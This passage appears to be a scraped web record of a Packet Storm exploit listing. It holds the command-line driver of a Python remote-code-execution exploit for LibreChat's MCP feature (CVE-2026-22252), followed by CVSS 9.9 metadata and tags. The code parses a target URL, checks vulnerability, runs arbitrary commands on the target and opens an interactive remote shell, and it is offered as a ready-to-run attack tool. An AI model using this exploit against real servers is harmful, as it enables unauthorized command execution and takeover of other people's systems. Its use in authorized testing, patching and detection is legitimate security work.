print(f\\”\\\\n[…] Output truncated ({len(output)} chars)\\”)\\n print(f\\”{‘=’*50}\\”)\\n else:\\n print(f\\”[no] Failed: {message}\\”)\\n \\n def main():\\n parser = argparse.ArgumentParser(\\n description=’LibreChat MCP RCE Exploit – Final Version’,\\n formatter_class=argparse.RawDescriptionHelpFormatter,\\n epilog=\\”\\”\\”\\n Examples:\\n %(prog)s -u http:\/\/localhost:3080 –check\\n %(prog)s -u http:\/\/target.com –test\\n %(prog)s -u http:\/\/target.com -c \\”id\\”\\n %(prog)s -u http:\/\/target.com –interactive\\n \\n Warning: For legal and ethical use only.\\n Written authorization required before testing any system.\\n \\”\\”\\”\\n )\\n \\n parser.add_argument(‘-u’, ‘–url’, required=True,\\n help=’Target URL (e.g., http:\/\/localhost:3080)’)\\n parser.add_argument(‘-c’, ‘–command’,\\n help=’Command to execute’)\\n parser.add_argument(‘-f’, ‘–command-file’,\\n help=’File containing commands to execute’)\\n parser.add_argument(‘–test’, action=’store_true’,\\n help=’Test vulnerability only’)\\n parser.add_argument(‘–check’, action=’store_true’,\\n help=’Check system only’)\\n parser.add_argument(‘–interactive’, action=’store_true’,\\n help=’Interactive mode’)\\n parser.add_argument(‘–username’, default=’test_user’,\\n help=’Username (default: test_user)’)\\n parser.add_argument(‘–password’, default=’Test12345!’,\\n help=’Password (default: Test12345!)’)\\n parser.add_argument(‘–email’, default=’test@example.local’,\\n help=’Email (default: test@example.local)’)\\n parser.add_argument(‘–timeout’, type=int, default=30,\\n help=’Timeout in seconds (default: 30)’)\\n parser.add_argument(‘–verbose’, ‘-v’, action=’store_true’,\\n help=’Show detailed information’)\\n parser.add_argument(‘–output-mode’, choices=[‘direct’, ‘file’, ‘encoded’],\\n default=’encoded’, help=’Output extraction method’)\\n \\n args = parser.parse_args()\\n \\n if args.verbose:\\n logging.getLogger().setLevel(logging.DEBUG)\\n \\n print(\\”=\\”*60)\\n print(\\”LibreChat MCP RCE Exploit by indoushka\\”)\\n print(\\”CVE-2026-22252\\”)\\n print(\\”=\\”*60)\\n \\n try:\\n exploit = LibreChatExploit(args.url, args.timeout)\\n \\n print(\\”[*] Checking target system…\\”)\\n target_ok, target_msg = exploit.check_target()\\n \\n if not target_ok:\\n print(f\\”[no] {target_msg}\\”)\\n sys.exit(1)\\n \\n print(f\\”[ok] {target_msg}\\”)\\n print(f\\”\\\\n[*] System Information:\\”)\\n print(f\\” – Version: {exploit.target_info.version or ‘unknown’}\\”)\\n print(f\\” – OS: {exploit.target_info.os_type}\\”)\\n print(f\\” – Shell: {exploit.target_info.shell_type}\\”)\\n print(f\\” – CSRF: {‘enabled’ if exploit.target_info.csrf_enabled else ‘disabled’}\\”)\\n if exploit.target_info.public_paths:\\n print(f\\” – Public paths: {‘, ‘.join(exploit.target_info.public_paths)}\\”)\\n \\n print(\\”\\\\n[*] Checking MCP endpoint…\\”)\\n mcp_ok, mcp_msg = exploit.check_mcp_endpoint()\\n print(f\\”[*] MCP: {mcp_msg}\\”)\\n \\n if not mcp_ok and \\”requires authentication\\” not in mcp_msg:\\n print(f\\”[!] Warning: {mcp_msg}\\”)\\n if not args.interactive:\\n sys.exit(1)\\n \\n if args.check:\\n sys.exit(0)\\n \\n if args.test:\\n print(\\”\\\\n[*] Testing vulnerability…\\”)\\n vulnerable, vuln_msg, output = exploit.test_vulnerability()\\n \\n if vulnerable:\\n print(f\\”[ok] {vuln_msg}\\”)\\n if output:\\n print(f\\”\\\\n[+] Sample output:\\\\n{output[:500]}\\”)\\n else:\\n print(f\\”[no] {vuln_msg}\\”)\\n \\n sys.exit(0)\\n \\n if args.command:\\n output_mode = ExploitMode(args.output_mode)\\n print(f\\”\\\\n[*] Executing command: {args.command}\\”)\\n success, message, output = exploit.execute_command(args.command, output_mode)\\n \\n if success:\\n print(f\\”[ok] {message}\\”)\\n if output:\\n print(f\\”\\\\n[+] Output:\\\\n{output}\\”)\\n else:\\n print(f\\”[no] {message}\\”)\\n \\n elif args.interactive:\\n shell = InteractiveExploitShell(exploit)\\n shell.run()\\n \\n else:\\n print(\\”\\\\n[!] No action specified. Use –help for help\\”)\\n \\n except KeyboardInterrupt:\\n print(\\”\\\\n\\\\n[*] Interrupted by user\\”)\\n sys.exit(0)\\n except Exception as e:\\n logger.error(f\\”Unexpected error: {e}\\”)\\n sys.exit(1)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214609″,”cvss”:{“score”:9.9,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214609\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-30T17:50:33″,”description”:”This proof of concept exploit targets the LibreChat MCP remote code execution vulnerability known as CVE-2026-22252. It provides a comprehensive and professional framework for detecting,…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,45,12,13,53,7,11,5],"class_list":["post-38350","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-99","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n